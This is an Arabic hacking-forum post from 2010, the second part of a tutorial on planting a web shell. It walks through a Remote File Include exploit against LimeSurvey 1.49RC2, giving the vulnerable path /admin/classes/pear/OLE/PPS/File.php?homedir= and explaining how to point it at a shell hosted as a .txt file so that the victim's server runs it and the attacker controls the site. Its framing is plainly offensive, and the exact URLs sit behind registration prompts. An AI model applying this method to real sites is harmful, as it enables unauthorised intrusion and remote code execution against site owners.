منظمة مخلص وبيكو للأختراق
مرحبا بكم في منتدى منظمة مخلص وبيكو للآختراق هذا المنتدى يشمل جميع ادوات الاختراق وبرامج الاختراق ادارة منتدى منظمة مخلص وبيكو للآختراق تتمنى لكم اجمل الاوقات كما تشرفنا عزيزي الزائر بالتسجيل
منظمة مخلص وبيكو للأختراق
مرحبا بكم في منتدى منظمة مخلص وبيكو للآختراق هذا المنتدى يشمل جميع ادوات الاختراق وبرامج الاختراق ادارة منتدى منظمة مخلص وبيكو للآختراق تتمنى لكم اجمل الاوقات كما تشرفنا عزيزي الزائر بالتسجيل
منظمة مخلص وبيكو للأختراق
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منظمة مخلص وبيكو للأختراق

هہذا الہہمہنہہتہہہدى يہہشہہمہہل جہہمہيہہہع بہرامہج و ادواتہ الہہهہكہر والہلآختراقہ
 
الرئيسيةأحدث الصورالتسجيلدخول
مرحبا بكم في منتدى منظمة مخلص وبيكو للأختراق هذا المنتدى يشمل جميع ادوات الاختراق وبرامج الهكرز ادارة منتدى منظمة مخلص وبيكو للأختراق تتمنى لكم اجمل الاوقات كما يشرفنا عزيزي الزائر بتسجيلك في المنتدى بالضغط على كلمة التسجيل
تعلن ادارة المنظمة بأن اي عضو تصل مشاركاتة اكثر من 30 موضوع سوف يكون مشرف او مراقب عام على المنتدى ووفقكم الله

 

 طرق رفع الشل الجزء 2

اذهب الى الأسفل 
كاتب الموضوعرسالة
Fҝ_ÄĻ_QRŞҢ

طرق رفع الشل الجزء 2  NZe93077
Fҝ_ÄĻ_QRŞҢ


عدد المساهمات : 42
تاريخ التسجيل : 28/09/2010

طرق رفع الشل الجزء 2  Empty
مُساهمةموضوع: طرق رفع الشل الجزء 2    طرق رفع الشل الجزء 2  Icon_minitimeالأحد أكتوبر 03, 2010 3:31 am



كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....


- رفع الشيل عبر ثغرات File Include فايل إنكلود -


اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع


milw0rm

SecurityReason.com - Our Reason is Security


أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :



كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...


طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
كود:

Type : RFI(Remote File Include)

أي ثغره من نوع فايل إنكلود .

2- اسم السكربت المصاب :
كود:

****** name : LimeSurvey (PHPSurveyor)

3-الإصدار المصاب وهو :
كود:

Version : 1.49RC2



المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
كود:

/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]



الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

والسكربت المصاب والإصدار هو :
كود:

LimeSurvey والإصدار 1.49RC2

وهو راكب عليه هكذا :
كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل




وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :


كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
كود:

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..



وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله


ودمتم سالمين

تحيات \بيكو..........هكر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
طرق رفع الشل الجزء 2
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  طريقة رفع الشل من ثغرات السكيول
» اول برنامج لرفع الشل على الموقع المستهدف

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منظمة مخلص وبيكو للأختراق :: مہہنہہہتہہديہات عہہالہہم الہہهہہہہكہہہرز :: اختراق المواقع والسيرفرات-
انتقل الى:  
الساعة الأن بتوقيت (أسم بلدك)
جميع الحقوق محفوظة لـمنظمة مخلص وبيكو للأختراق
 Powered by Aseer Al Domoo3 ®https://m5las-beko-hackr.own0.com
حقوق الطبع والنشر©2011 - 2010